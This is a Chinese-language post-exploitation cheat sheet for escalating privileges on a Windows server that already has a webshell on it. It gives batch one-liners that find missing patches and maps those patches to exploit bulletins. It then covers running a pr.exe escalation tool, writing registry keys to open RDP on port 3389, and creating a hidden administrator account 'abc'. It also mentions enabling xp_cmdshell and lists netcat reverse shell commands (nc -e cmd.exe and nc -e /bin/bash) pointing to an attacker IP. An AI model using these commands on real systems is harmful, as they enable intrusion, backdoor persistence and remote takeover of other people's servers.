一、基于WebShell的提权
1、访问大马,查看权限
2、如果遇到拒绝访问什么可以上传一个aspx的大马,这个权限比较大
二、window提权
1、查看系统打补丁情况
win2003:
systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3057191 KB2840221 KB3000061 KB2850851 KB2711167 KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 KB942831 KB2503665 KB2592799 KB956572 KB977165 KB2621440) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:Windows\tmp\temp.txt
通用型:
systeminfo>C:Windows\tmp\temp.txt&(for %i in (KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195) do @type C:Windows\tmp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /q /a C:WindowsTemptemp.txt
2、补丁对照表,上传exe,执行命令
KB952004 :MS09-012 PR
KB956572 :MS09-012 巴西烤肉
KB2393802:MS11-011
KB2592799:MS11-080
KB2621440:MS12-0203
KB2160329:MS10-048
KB970483 :MS09-020 iis6提权(可能是)
KB2124261,KB2271195 MS10-065 IIS7提权(可能是)
KB977165 :MS10-015
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB3077657 MS15_077 字体提权
KB944653 MS07-067
KB952004 MS09-012
KB971657 MS09-041
KB2620712 MS11-097
kb942831 MS08-005
KB2503665 MS11-046
KB2592799 MS11-080
3、由于存在PR提权漏洞,所以上传一个pr.exe执行
4、一般哪些目录有读写权限
日志,缓存、回收站、大马所在目录
5、开启3389,命令行
新建一个bat文件,里面输入以下内容,上传到相应目录
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
命令行执行
/c c:\aiyou\pr.exe "c:\aiyou\3389.bat"
2、用工具开3389端口
3、创建用户并添加管理员组
net user abc 123 /add
net localgroup administrators abc /add
三、数据库提权
XP_CMDSHELL开启方法,新建查询
四、反弹shell
1、正向连接,主动连接服务器,服务器开启相应端口
2、反向连接,服务器主动连接我们,我们监听某一端口
小攻: nc -lvvp 1234
小受(webshell):nc.exe -e cmd.exe 192.168.1.133(小攻ip) 1234
3、获取权限
4、linux系统nc -e /bin/bash 小攻ip 1234
禁止非法,后果自负